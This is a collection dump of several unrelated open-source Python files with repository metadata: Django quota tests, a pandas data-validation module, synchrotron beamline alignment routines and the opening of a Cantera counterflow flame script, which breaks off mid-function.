| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8353b4d77cc3f82f74b32d42e55870e0d315218c
| 42
|
py
|
Python
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 4
|
2021-07-06T14:42:09.000Z
|
2022-02-24T10:19:18.000Z
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 30
|
2020-10-02T20:24:28.000Z
|
2022-03-31T18:29:07.000Z
|
stixpy/timeseries/__init__.py
|
nicHoch/stixpy
|
cdb86094995590da36f3ae5e01f4ca4b9aac819c
|
[
"BSD-3-Clause"
] | 8
|
2021-04-16T11:00:13.000Z
|
2022-03-31T10:09:29.000Z
|
from stixpy.timeseries.quicklook import *
| 21
| 41
| 0.833333
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
360bed4d77495a28172ed474aa2d2803ac44844d
| 12,967
|
py
|
Python
|
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_profile/test_quota/test_model.py
|
SyedMaseerulla/squest
|
d741a928f6361cf355607c2def31b0539592814b
|
[
"Apache-2.0"
] | 1
|
2022-03-24T03:37:12.000Z
|
2022-03-24T03:37:12.000Z
|
from unittest import mock
from profiles.models import BillingGroup, QuotaBinding, Quota
from resource_tracker.models import Resource, ResourceGroup
from service_catalog.models import Instance
from service_catalog.tasks import async_resource_attribute_quota_bindings_update_consumed, \
async_quota_bindings_update_consumed, async_quota_bindings_remove_instance, \
async_quota_bindings_add_instance, async_quota_bindings_add_resource, \
async_quota_bindings_remove_resource
from tests.test_profile.test_quota.base_test_quota import BaseTestQuota
class TestQuotaModel(BaseTestQuota):
def setUp(self):
super(TestQuotaModel, self).setUp()
def test_get_available(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 100
self.assertEqual(self.quota_binding.available, 100 - self.quota_binding.consumed)
def test_get_percentage(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 100
self.assertEqual(self.quota_binding.percentage, self.quota_binding.consumed)
def test_get_percentage_without_limit(self):
self.quota_binding = self.test_billing_group.quota_bindings.first()
self.quota_binding.limit = 0
self.assertEqual(self.quota_binding.percentage, None)
def _set_up_update_consumed(self):
self.billing_group = BillingGroup.objects.create(name='test_billing')
self.billing_group_2 = BillingGroup.objects.create(name='test_billing_2')
self.instance = Instance.objects.create(name='test_instance', billing_group=self.billing_group)
self.instance_2 = Instance.objects.create(name='test_instance_2', billing_group=self.billing_group)
self.instance_3 = Instance.objects.create(name='test_instance_3', billing_group=self.billing_group_2)
self.instance_4 = Instance.objects.create(name='test_instance_4')
self.resource_group = ResourceGroup.objects.create(name='test_rg')
self.attribute_definition = self.resource_group.add_attribute_definition('test_ad')
self.attribute_definition_2 = self.resource_group.add_attribute_definition('test_ad_2')
self.quota_attribute = Quota.objects.create(name='test_update')
self.quota_attribute.attribute_definitions.add(self.attribute_definition)
self.quota_binding = QuotaBinding.objects.create(billing_group=self.billing_group, quota=self.quota_attribute)
self.quota_binding_2 = QuotaBinding.objects.create(billing_group=self.billing_group_2,
quota=self.quota_attribute)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
# Create attributes linked to billing group
self.resource = Resource.objects.create(name='test_update_1', resource_group=self.resource_group,
service_catalog_instance=self.instance)
self.resource.set_attribute(self.attribute_definition, 16)
self.resource.set_attribute(self.attribute_definition_2, 32)
self.resource_2 = Resource.objects.create(name='test_update_2', resource_group=self.resource_group,
service_catalog_instance=self.instance)
self.resource_2.set_attribute(self.attribute_definition, 16)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 16 * 2)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
self.resource_3 = Resource.objects.create(name='test_update_3', resource_group=self.resource_group,
service_catalog_instance=self.instance_2)
self.resource_3.set_attribute(self.attribute_definition, 16)
self.resource_4 = Resource.objects.create(name='test_update_4', resource_group=self.resource_group,
service_catalog_instance=self.instance_2)
self.resource_4.set_attribute(self.attribute_definition, 16)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_changed_in_resource_with_same_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_removed_in_resource(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = None
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_changed_in_resource_with_different_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance_3
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 1 * 16)
def test_instance_changed_in_resource_without_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance_4
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_bg_changed_in_instance(self):
self._set_up_update_consumed()
self.instance.billing_group = self.billing_group_2
with mock.patch("service_catalog.tasks.async_quota_bindings_add_instance.delay", wraps=async_quota_bindings_add_instance):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_instance.delay", wraps=async_quota_bindings_remove_instance):
self.instance.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 2 * 16)
def test_bg_removed_in_instance(self):
self._set_up_update_consumed()
self.instance.billing_group = None
with mock.patch("service_catalog.tasks.async_quota_bindings_add_instance.delay", wraps=async_quota_bindings_add_instance):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_instance.delay", wraps=async_quota_bindings_remove_instance):
self.instance.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_rg(self):
self._set_up_update_consumed()
count = 0
for resource in self.resource_group.resources.all():
count += resource.attributes.count()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.resource_group.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_resource(self):
self._set_up_update_consumed()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.resource.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_instance(self):
self._set_up_update_consumed()
count = 0
for resource in self.instance.resources.all():
count += resource.attributes.count()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.instance.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_attribute_definitions_added_in_quota_attribute(self):
self._set_up_update_consumed()
with mock.patch("service_catalog.tasks.async_quota_bindings_update_consumed.delay", wraps=async_quota_bindings_update_consumed):
self.quota_attribute.attribute_definitions.add(self.attribute_definition_2)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16 + 32)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_attribute_definitions_removed_in_quota_attribute(self):
self._set_up_update_consumed()
with mock.patch("service_catalog.tasks.async_quota_bindings_update_consumed.delay", wraps=async_quota_bindings_update_consumed):
self.quota_attribute.attribute_definitions.remove(self.attribute_definition)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_tasks_quota_update_consumed(self):
self._set_up_update_consumed()
quota_binding_value = dict()
for binding in self.quota_attribute.quota_bindings.all():
quota_binding_value[binding.id] = binding.consumed
wrong_value = 9999999
for binding in self.quota_attribute.quota_bindings.all():
binding.consumed = wrong_value
binding.save()
async_quota_bindings_update_consumed(self.quota_attribute.id)
for binding in self.quota_attribute.quota_bindings.all():
self.assertNotEqual(binding.consumed, wrong_value)
self.assertEqual(binding.consumed, quota_binding_value.get(binding.id))
def test_value_changed_in_resource_attribute(self):
self._set_up_update_consumed()
attribute = self.resource.attributes.first()
with mock.patch("service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
attribute.value += 16
attribute.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 5 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
| 56.872807
| 174
| 0.726151
| 1,610
| 12,967
| 5.444721
| 0.056522
| 0.085216
| 0.133242
| 0.090349
| 0.876454
| 0.856035
| 0.791695
| 0.753365
| 0.704084
| 0.678074
| 0
| 0.015178
| 0.192103
| 12,967
| 227
| 175
| 57.123348
| 0.821592
| 0.003162
| 0
| 0.578431
| 0
| 0
| 0.106786
| 0.093632
| 0
| 0
| 0
| 0
| 0.171569
| 1
| 0.088235
| false
| 0
| 0.029412
| 0
| 0.122549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36b6aa56003524fa9b82afaab7665b9fcaebbcd7
| 3,963
|
py
|
Python
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 1
|
2020-01-09T22:18:13.000Z
|
2020-01-09T22:18:13.000Z
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 15
|
2020-01-07T01:05:47.000Z
|
2021-06-16T16:12:21.000Z
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 3
|
2020-03-06T18:10:09.000Z
|
2021-06-16T16:20:16.000Z
|
"""
Summary
-------
The purpose of this module is to validate data structures produced by the
`calsim_toolkit` library.
"""
# %% Import libraries.
# Import third party libraries.
import pandas as pd
# %% Define functions.
def is_catalog(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure columns are appropriate.
val_col = ['File Path', 'Pathname']
if 'Study' in df.columns:
val_col += ['Study']
if (set(val_col) != set(df.columns)):
if verbose:
msg = ('DataFrame columns do not match catalog format'
' specifications.')
print(msg)
return False
# Return success.
return True
def is_tidy(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure columns are appropriate.
val_col = ['DateTime', 'Pathname', 'Units', 'Data Type', 'Value']
if 'Study' in df.columns:
val_col += ['Study']
if (set(val_col) != set(df.columns)):
if verbose:
msg = 'DataFrame columns do not match tidy format specifications.'
print(msg)
return False
# Check that there are no duplicates.
check_col = list(set(val_col) - set(['Value']))
duplicates = df.duplicated(check_col, keep=False)
if duplicates.any():
if verbose:
print(df.loc[duplicates, :])
msg = ('DataFrame contains duplicate records (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
def is_wide(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure level names are appropriate.
val_lvl = ['Part A', 'Part B', 'Part C', 'Part E',
'Part F', 'Units', 'Data Type']
if 'Study' in df.columns.names:
val_lvl += ['Study']
if (set(val_lvl) != set(df.columns.names)):
if verbose:
msg = ('DataFrame column level names do not match wide format'
' specifications.')
print(msg)
return False
# Check that there are no duplicate column headers.
duplicates = df.columns.duplicated(keep=False)
if duplicates.any():
if verbose:
print(df.loc[:, duplicates])
msg = ('DataFrame contains duplicate columns (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
def is_condense(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure level names are appropriate.
val_lvl = ['Part A', 'Part B', 'Part C', 'Part E',
'Part F', 'Units & Type']
if 'Study' in df.columns.names:
val_lvl += ['Study']
if not (set(df.columns.names) <= set(val_lvl)):
if verbose:
msg = ('DataFrame column level names do not match condense format'
' specifications.')
print(msg)
return False
# Check that there are no duplicate column headers.
duplicates = df.columns.duplicated(keep=False)
if duplicates.any():
if verbose:
print(df.loc[:, duplicates])
msg = ('DataFrame contains duplicate columns (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
# %% Execute script.
if __name__ == '__main__':
msg = ('This module is intended to be imported for use into another'
' module. It is not intended to be run as a __main__ file.')
raise RuntimeError(msg)
| 33.025
| 78
| 0.591723
| 487
| 3,963
| 4.749487
| 0.223819
| 0.038911
| 0.042369
| 0.057501
| 0.771293
| 0.771293
| 0.762646
| 0.762646
| 0.762646
| 0.762646
| 0
| 0
| 0.299016
| 3,963
| 119
| 79
| 33.302521
| 0.832613
| 0.169316
| 0
| 0.722892
| 0
| 0
| 0.28974
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.024096
| 0
| 0.204819
| 0.120482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36d4ceea6ff8fb8bf8338df3bdbc6de8541a6a9a
| 13,038
|
py
|
Python
|
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | null | null | null |
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 13
|
2018-09-25T19:35:08.000Z
|
2021-01-15T20:42:26.000Z
|
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 3
|
2019-09-06T01:40:59.000Z
|
2020-07-01T20:27:39.000Z
|
import matplotlib.pyplot as plt
import numpy as np
print(f'Loading {__file__}')
def align_gisaxs_height(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.y, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.y, ps.cen)
def align_gisaxs_height_rb(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.y, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.y, ps.peak)
def align_gisaxs_th(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], piezo.th, -rang, rang, point)
ps(plot = False)
yield from bps.mv(piezo.th, ps.peak)
def align_xrr_prs(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], prs, -rang, rang, point)
ps(plot = False)
yield from bps.mv(prs, ps.peak)
def align_xrr_height(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.x, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.x, ps.peak)
def align_gisaxs_height_hex(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], stage.y, -rang, rang, point)
ps(der=der,plot = False)
yield from bps.mv(stage.y, ps.cen)
def align_gisaxs_th_hex(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], stage.th, -rang, rang, point)
ps(plot = False)
yield from bps.mv(stage.th, ps.peak)
def alignement_gisaxs(angle=0.15):
"""
Regular alignement routine for gisaxs and giwaxs. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height(800, 21, der=True)
yield from align_gisaxs_th(1.5, 27)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 21)
yield from align_gisaxs_height_rb(150, 16)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_doblestack(angle=0.15):
"""
Modification of teh regular alignement routine for the doble-stack. Since top row is out of the center of rotation of of theta, the alignement on teh direc does not work.
Therefore, only teh height is aligned on the direct beam but the incident angle is aligned on the reflected beam with a small incident angle.
The alignement on the reflected beam is the same as for regular alignement.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan height on the DB only
yield from align_gisaxs_height(800, 21, der=True)
# alignement of incident angle at ai = 0.1 deg so the alignement use the reflected roi not sitting on the db position
yield from smi.setReflectedBeamROI(total_angle=0.1, technique='gisaxs')
yield from align_gisaxs_th(1.5, 27)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 21)
yield from align_gisaxs_height_rb(150, 16)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_multisample(angle=0.15):
"""
This is design to align several samples at the same time. The attenuators, bs motion, ... needs to be done outside of this maccro, so there is no back and forth in term
of motor motion from sample to sample.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
# yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height(700, 16, der=True)
yield from align_gisaxs_th(1, 15)
yield from align_gisaxs_height(300, 11, der=True)
yield from align_gisaxs_th(0.5, 16)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 31)
yield from align_gisaxs_height_rb(150, 21)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
# yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_hex(angle=0.1):
"""
Regular alignement routine for gisaxs and giwaxs using the hexapod. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height_hex(0.5, 21, der=True)
yield from align_gisaxs_th_hex(0.5, 11)
# move to theta 0 + value
yield from bps.mv(stage.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th_hex(0.3, 21)
yield from align_gisaxs_height_hex(0.1, 21)
yield from align_gisaxs_th_hex(0.05, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(stage.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_hex_short(angle = 0.12):
"""
Short alignement routine for gisaxs and giwaxs using the hexapod. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height_hex(0.500, 21, der=True)
# move to theta 0 + value
yield from bps.mvr(stage.th, angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle)
# Scan theta and height
yield from align_gisaxs_th_hex(0.7, 23)
yield from align_gisaxs_height_hex(0.15, 31)
yield from align_gisaxs_th_hex(0.06, 25)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(stage.th, ps.cen-angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def quickalign_gisaxs(angle = 0.15):
"""
Short alignement with only alignement on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle)
# Scan theta and height
yield from align_gisaxs_height_rb(200, 31)
yield from align_gisaxs_th(0.1, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_xrr(angle=0.15):
"""
This routine is for samples mounted at 90 degrees, so the alignement is done using prs stage as incident angle and piezo.x as height
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='xrr')
# Set direct beam ROI
yield from smi.setDirectBeamROI(technique='xrr')
# Scan theta and height
yield from align_xrr_height(800, 16, der=True)
# For XRR alignment, a poor results was obtained at incident angle 0. To improve the alignment success
# the prs alignment is done at an angle of 0.15 deg
yield from smi.setReflectedBeamROI(total_angle=-0.15, technique='xrr')
yield from align_xrr_prs(1, 20)
yield from smi.setDirectBeamROI()
yield from align_xrr_height(500, 13, der=True)
yield from smi.setReflectedBeamROI(total_angle=-0.15, technique='xrr')
yield from align_xrr_prs(0.5, 21)
yield from bps.mv(prs, ps.peak + 0.0725)
# move to theta 0 + value
yield from bps.mv(prs, ps.peak - angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=-2*angle, technique='xrr')
# Scan theta and height
yield from align_xrr_prs(0.2, 31)
yield from align_xrr_height(200, 21)
yield from align_xrr_prs(0.05, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(prs, ps.cen + angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
| 34.492063
| 178
| 0.636447
| 1,805
| 13,038
| 4.469252
| 0.105817
| 0.105987
| 0.060741
| 0.069419
| 0.854469
| 0.837858
| 0.818396
| 0.778604
| 0.75815
| 0.743523
| 0
| 0.029355
| 0.2867
| 13,038
| 377
| 179
| 34.583554
| 0.838065
| 0.314619
| 0
| 0.610063
| 0
| 0
| 0.017679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08805
| false
| 0
| 0.012579
| 0
| 0.100629
| 0.006289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7fd29797b5349f25f952a69bf6fcc646ff774ce4
| 7,421
|
py
|
Python
|
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
# one stream unburnt, one stream equilibrium
#%%
import numpy as np
import cantera as ct
import pyutils.ctutils.gas as cg
from pyutils.filename import params2name
# %%
def counterflow_premixed_flame(
chemistry = 'gri30.xml',
fuel = {'CH4':1.},
oxidizer = {'O2':1, 'N2':3.76},
temperature = 300.,
pressure = 1.,
phi = 1.,
a = 1000.,
solution = None,
**kwargs
):
# for unrealistic parameters
if pressure < 0.:
raise ValueError('Negative pressure')
if temperature < 0.:
raise ValueError('Negative inlet temperature')
if phi < 0.:
raise ValueError('Negative equivalence ratio')
# read kwargs
if 'transport' in kwargs.keys():
transport = kwargs['transport']
else:
transport = 'Mix'
if 'width' in kwargs.keys():
width = kwargs['width']
else:
width = 0.05
if 'loglevel' in kwargs.keys():
loglevel = kwargs['loglevel']
else:
# supress log output
loglevel = 0
# kwargs for flame solver
if 'ct_ratio' in kwargs.keys():
ct_ratio = kwargs['ct_ratio']
else:
ct_ratio = 2.
if 'ct_slope' in kwargs.keys():
ct_slope = kwargs['ct_slope']
else:
ct_slope = 0.02
if 'ct_curve' in kwargs.keys():
ct_curve = kwargs['ct_curve']
else:
ct_curve = 0.02
if 'ct_prune' in kwargs.keys():
